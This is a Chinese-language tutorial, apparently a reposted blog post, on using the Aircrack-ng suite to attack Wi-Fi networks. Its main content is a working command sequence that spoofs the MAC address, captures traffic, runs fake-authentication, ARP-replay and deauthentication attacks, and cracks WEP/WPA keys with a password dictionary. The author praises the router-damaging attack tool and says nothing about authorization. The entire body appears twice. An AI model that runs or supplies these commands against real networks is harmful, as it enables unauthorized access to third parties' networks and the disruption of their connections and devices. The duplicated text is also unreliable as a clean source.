aircrack使用

aircrack使用Aircrack ng 系列工具也有 windows 平台版本 但是本人的小黑的始终不能在 win 下抓包 所以只能弃 win 从 lin 了 另外 win 下扫描到的 AP 也比 lin 下少了很多 其实 WIN 并不完整的支持 TCP IP 协议族 有些协议 win 直接丢弃不用 网络本来从一开始就是 unix 的天下 win 只是在后来加入了网络的功能 Aircrack ng 工具包有很多工

 

——————————————————————————————

 下面详细介绍一下各个命令的基本用法(参照命令的英文说明)

  1. ifconfig

  用来配置网卡,我们这里主要用来 禁用和启用 网卡:

  ifconfig ath0 down

  ifconfig ath0 up

  禁用一下网卡的目的是为了下一步修改 MAC 。

  2.macchanger

  用来改变网卡的 MAC 地址,具体用法如下:

  usage: macchanger [options] device

  -h 显示帮助

  -V 显示版本

  -s 显示当前MAC

  -e 不改变mac,使用硬件厂商写入的MAC

  -a 自动生成一个同类型的MAC,同厂商的

  -A 自动生成一个不同类型的MAC,不同厂商的

  -r 生成任意MAC

  -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品

  -m 设置一个自定义的MAC 如: macchanger –mac=00:34:00:00:00:00 ath0 。

  3.airmon-ng

  启动无线网卡进入 Monitor 模式,

  useage: airmon-ng


[channel]

  

启动,停止,检测

  

指定无线网卡

  [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了

  4.iwconfig

  专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。

  useage:iwconfig interface [options]

  [essid{NN|ON|OFF}] 指定essid号 开启关闭

  [nwid{NN|on|off}] 指定网络id号 开启关闭

  [mode {managed|ad-hoc|….}] 指定无线网络工作模式/类型

  [freq N.NNNN[K|M|G]] 指定工作频率

  [channel N] 指定频道

  [ap {N|off|auto}] 指定AP号 关闭/自动

  [sens N] sens 号

  [nick N] nick 号

  [rate {N|auto|fixed}] 速率控制

  [rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了

  [frag {N|auto|fixed|off}] 碎片控制

  [enc {NNNN-NNNN|off}] 范围

  [power {period N|timeout N}] 电源 频率/超时

  [retry {limit N|lifetime N}] 重试 限次/超时

  [txpower N{mw|dBm}] 功率 毫瓦/分贝

  [commit] 处理

  5.iwlist

  主要用来显示无线网卡的一些附加信息,同上

  useage: iwlist [interface] options

  scanning 扫描

  frequency 频率

  channel 频道

  bitrate 速率

  rate 速率

  encryption 加密

  key 密钥

  power 电源

  txpower 功率

  ap ap

  accespoints ap

  peers 直连

  event 事件

  6.airodump-ng

  抓包工具,我最喜欢用的,详细用法如下:

  usage: airodump-ng

[,

,…]


  Options:

  –ivs :仅将抓取信息保存为 .ivs

  –gpsd :使用 GPSd

  –write :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

  -w :同 –write

  –beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

  –update

:显示更新延迟,没有用过

  –showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了

  -h :隐藏已知的,配合上面的选项使用

  -f

:跳频时间

  –berlin

:无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻 译的都会有出入,这是我的理解.(mhy_mhy注)

  -r

:从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵

  Filter options:

  –encrypt

: 使用密码序列过滤 AP

  –netmask

: 使用掩码过滤 AP

  –bssid

: 使用 bssid 过滤 AP

  -a : 过滤无关的客户端

  默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:

  –channel

:指定频道

  –band

:制定带宽

  -C

:指定频率MHz

  –cswitch

: 设置频道交换方式

  0 : FIFO (default) 先进先出(默认)

  1 : Round Robin 循环

  2 : Hop on last 最后一跳

  -s : 同上

  –help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

  7.aireplay-ng

  搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

  usage: aireplay-ng

  Filter options:

  -b bssid : AP的 MAC

  -d dmac : 目标的 MAC

  -s smac : 来源的 MAC

  -m len : 最小包长度

  -n len : 最大包长度

  -u type : 帧控制, type field

  -v subt : 帧控制, subtype field

  -t tods : 帧控制, To DS bit

  -f fromds : 帧控制, From DS bit

  -w iswep : 帧控制, WEP bit

  -D : 禁用 AP 发现功能

  Replay options:

  -x nbpps : 每秒包数量

  -p fctrl : 框架设定 (hex)

  -a bssid : 设置AP的 mac

  -c dmac : 设置目标的 MAC

  -h smac : 设置来源的 mac

  -g value : 改变环缓存大小 (默认8)

  -F : 选择第一个匹配的包

  Fakeauth attack options:

  -e essid : 设置目标 AP 的 SSID

  -o npckts : 每秒爆破的包数量 (0 自动, 默认 1)

  -q sec : 存活时间 秒

  -y prga : 共享可信的 key流

  ARP欺骗原理 Replay attack options:

  -j : 注入 fromDS 数据包,还没有用过这个选项

  Fragmentation attack options:

  -k IP : 设置目的IP 碎片

  -l IP : 设置源IP碎片

  Test attack options:

  -B : 激活 bitrate 测试

  source options:

  -i iface : 设置抓包的接口设备

  -r file : 从pcap文件析取数据包

  attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方

  –deauth count : 不信任一切 (-0)

  –fakeauth delay : 欺骗AP的信任 (-1)

  –interactive : 交互的选择 (-2)

  –arpreplay : 标准的 ARP欺骗原理-request replay (-3)

  –chopchop : 解密 WEP 包 (-4)

  –fragment : 生成有效的 key流 (-5)

  –caffe-latte : 从客户端获取新的 IVs (-6)

  –cfrag : 对客户端进行碎片攻击 (-7)

  –test : 测试注射及效果 (-9)

  –help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.

  8.aircrack-ng

  激活成功教程KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

  usage: aircrack-ng [options] <.cap / .ivs file(s)>

  Common options:

  -a

: 暴破 (1/WEP, 2/WPA-PSK)

  -e

: 选择 essid 为目标

  -b

: 选择 ap的 mac 为目标,就是激活成功教程识别的关键字

  -q : 使用安静模式,无数出模式

  -C

: 将所有的 AP 合并为一个虚拟的

  Static WEP cracking options:

  -c : 仅搜索字母数字

  -t : 仅搜索二进制

  -h : 搜索数字关键字 (用于坏掉的部分),翻译不出来了

  -d

: 指定掩码(A1:XX:CF:YY)

  -m

: 用 MAC 匹配可用的数据包

  -n

: WEP 长度 64/128/152/256/512

  -i

: WEP 索引(1 to 4), default: any

  -f

: 暴破强度 默认2,原文字面意思是”禽兽强迫 捏造 事实”,呵呵

  -k

: 禁用一种激活成功教程方式 (1 to 17)

  -x or -x0 : 禁用最新关键字暴破

  -x1 : 使用最新关键字暴破 默认

  -x2 : 用最新两个字节暴破

  -y : 实验单线程模式

  -K : KoreK 攻击 (pre-PTW)

  -s : 显示为 ASCII

  -M

: 最大数量 ivs 使用

  -D : WEP 非隐蔽模式

  -P

: PTW debug: 1 disable Klein, 2 PTW

  -1 : 尝试一次 PTW

  WEP and WPA-PSK cracking options:

  -w

: 指定目录文件,可以多个

  -r

: 制定 airolib-ng 数据库,不能和 -w 一起使用

  –help : 显示这个帮助

  下面以我的硬件实例来操作一下:

  我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:

  ifconfig ath0 down

  macchanger -r ath0

  macchanger -r wifi0

  ifconfig ath1 up

  airmon-ng start ath1 6

  iwconfig ath1

  iwlist ath1 scanning

  airodump-ng -w *.cap -c 6 ath1

  aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

  aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1

  aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1

  aireplay-ng -3 -b

-h

-i ath1

  aircrack-ng -x -f 2 *.cap

  aircrack-ng -w passdict.txt *.cap

  下面详细介绍一下各个命令的基本用法(参照命令的英文说明)

  1. ifconfig

  用来配置网卡,我们这里主要用来 禁用和启用 网卡:

  ifconfig ath0 down

  ifconfig ath0 up

  禁用一下网卡的目的是为了下一步修改 MAC 。

  2.macchanger

  用来改变网卡的 MAC 地址,具体用法如下:

  usage: macchanger [options] device

  -h 显示帮助

  -V 显示版本

  -s 显示当前MAC

  -e 不改变mac,使用硬件厂商写入的MAC

  -a 自动生成一个同类型的MAC,同厂商的

  -A 自动生成一个不同类型的MAC,不同厂商的

  -r 生成任意MAC

  -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品

  -m 设置一个自定义的MAC 如: macchanger –mac=00:34:00:00:00:00 ath0 。

  3.airmon-ng

  启动无线网卡进入 Monitor 模式,

  useage: airmon-ng


[channel]

  

启动,停止,检测

  

指定无线网卡

  [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了

  4.iwconfig

  专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。

  useage:iwconfig interface [options]

  [essid{NN|ON|OFF}] 指定essid号 开启关闭

  [nwid{NN|on|off}] 指定网络id号 开启关闭

  [mode {managed|ad-hoc|….}] 指定无线网络工作模式/类型

  [freq N.NNNN[K|M|G]] 指定工作频率

  [channel N] 指定频道

  [ap {N|off|auto}] 指定AP号 关闭/自动

  [sens N] sens 号

  [nick N] nick 号

  [rate {N|auto|fixed}] 速率控制

  [rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了

  [frag {N|auto|fixed|off}] 碎片控制

  [enc {NNNN-NNNN|off}] 范围

  [power {period N|timeout N}] 电源 频率/超时

  [retry {limit N|lifetime N}] 重试 限次/超时

  [txpower N{mw|dBm}] 功率 毫瓦/分贝

  [commit] 处理

  5.iwlist

  主要用来显示无线网卡的一些附加信息,同上

  useage: iwlist [interface] options

  scanning 扫描

  frequency 频率

  channel 频道

  bitrate 速率

  rate 速率

  encryption 加密

  key 密钥

  power 电源

  txpower 功率

  ap ap

  accespoints ap

  peers 直连

  event 事件

  6.airodump-ng

  抓包工具,我最喜欢用的,详细用法如下:

  usage: airodump-ng

[,

,…]


  Options:

  –ivs :仅将抓取信息保存为 .ivs

  –gpsd :使用 GPSd

  –write :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

  -w :同 –write

  –beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

  –update

:显示更新延迟,没有用过

  –showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了

  -h :隐藏已知的,配合上面的选项使用

  -f

:跳频时间

  –berlin

:无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻 译的都会有出入,这是我的理解.(mhy_mhy注)

  -r

:从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵

  Filter options:

  –encrypt

: 使用密码序列过滤 AP

  –netmask

: 使用掩码过滤 AP

  –bssid

: 使用 bssid 过滤 AP

  -a : 过滤无关的客户端

  默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:

  –channel

:指定频道

  –band

:制定带宽

  -C

:指定频率MHz

  –cswitch

: 设置频道交换方式

  0 : FIFO (default) 先进先出(默认)

  1 : Round Robin 循环

  2 : Hop on last 最后一跳

  -s : 同上

  –help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

  7.aireplay-ng

  搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

  usage: aireplay-ng

  Filter options:

  -b bssid : AP的 MAC

  -d dmac : 目标的 MAC

  -s smac : 来源的 MAC

  -m len : 最小包长度

  -n len : 最大包长度

  -u type : 帧控制, type field

  -v subt : 帧控制, subtype field

  -t tods : 帧控制, To DS bit

  -f fromds : 帧控制, From DS bit

  -w iswep : 帧控制, WEP bit

  -D : 禁用 AP 发现功能

  Replay options:

  -x nbpps : 每秒包数量

  -p fctrl : 框架设定 (hex)

  -a bssid : 设置AP的 mac

  -c dmac : 设置目标的 MAC

  -h smac : 设置来源的 mac

  -g value : 改变环缓存大小 (默认8)

  -F : 选择第一个匹配的包

  Fakeauth attack options:

  -e essid : 设置目标 AP 的 SSID

  -o npckts : 每秒爆破的包数量 (0 自动, 默认 1)

  -q sec : 存活时间 秒

  -y prga : 共享可信的 key流

  ARP欺骗原理 Replay attack options:

  -j : 注入 fromDS 数据包,还没有用过这个选项

  Fragmentation attack options:

  -k IP : 设置目的IP 碎片

  -l IP : 设置源IP碎片

  Test attack options:

  -B : 激活 bitrate 测试

  source options:

  -i iface : 设置抓包的接口设备

  -r file : 从pcap文件析取数据包

  attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方

  –deauth count : 不信任一切 (-0)

  –fakeauth delay : 欺骗AP的信任 (-1)

  –interactive : 交互的选择 (-2)

  –arpreplay : 标准的 ARP欺骗原理-request replay (-3)

  –chopchop : 解密 WEP 包 (-4)

  –fragment : 生成有效的 key流 (-5)

  –caffe-latte : 从客户端获取新的 IVs (-6)

  –cfrag : 对客户端进行碎片攻击 (-7)

  –test : 测试注射及效果 (-9)

  –help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.

  8.aircrack-ng

  激活成功教程KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

  usage: aircrack-ng [options] <.cap / .ivs file(s)>

  Common options:

  -a

: 暴破 (1/WEP, 2/WPA-PSK)

  -e

: 选择 essid 为目标

  -b

: 选择 ap的 mac 为目标,就是激活成功教程识别的关键字

  -q : 使用安静模式,无数出模式

  -C

: 将所有的 AP 合并为一个虚拟的

  Static WEP cracking options:

  -c : 仅搜索字母数字

  -t : 仅搜索二进制

  -h : 搜索数字关键字 (用于坏掉的部分),翻译不出来了

  -d

: 指定掩码(A1:XX:CF:YY)

  -m

: 用 MAC 匹配可用的数据包

  -n

: WEP 长度 64/128/152/256/512

  -i

: WEP 索引(1 to 4), default: any

  -f

: 暴破强度 默认2,原文字面意思是”禽兽强迫 捏造 事实”,呵呵

  -k

: 禁用一种激活成功教程方式 (1 to 17)

  -x or -x0 : 禁用最新关键字暴破

  -x1 : 使用最新关键字暴破 默认

  -x2 : 用最新两个字节暴破

  -y : 实验单线程模式

  -K : KoreK 攻击 (pre-PTW)

  -s : 显示为 ASCII

  -M

: 最大数量 ivs 使用

  -D : WEP 非隐蔽模式

  -P

: PTW debug: 1 disable Klein, 2 PTW

  -1 : 尝试一次 PTW

  WEP and WPA-PSK cracking options:

  -w

: 指定目录文件,可以多个

  -r

: 制定 airolib-ng 数据库,不能和 -w 一起使用

  –help : 显示这个帮助

  下面以我的硬件实例来操作一下:

  我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:

  ifconfig ath0 down

  macchanger -r ath0

  macchanger -r wifi0

  ifconfig ath1 up

  airmon-ng start ath1 6

  iwconfig ath1

  iwlist ath1 scanning

  airodump-ng -w *.cap -c 6 ath1

  aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

  aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1

  aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1

  aireplay-ng -3 -b

-h

-i ath1

  aircrack-ng -x -f 2 *.cap

  aircrack-ng -w passdict.txt *.cap

  aircrack-ng -n 64 -b apmac *.ivs

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/227462.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月16日 下午9:15
下一篇 2026年3月16日 下午9:16


相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号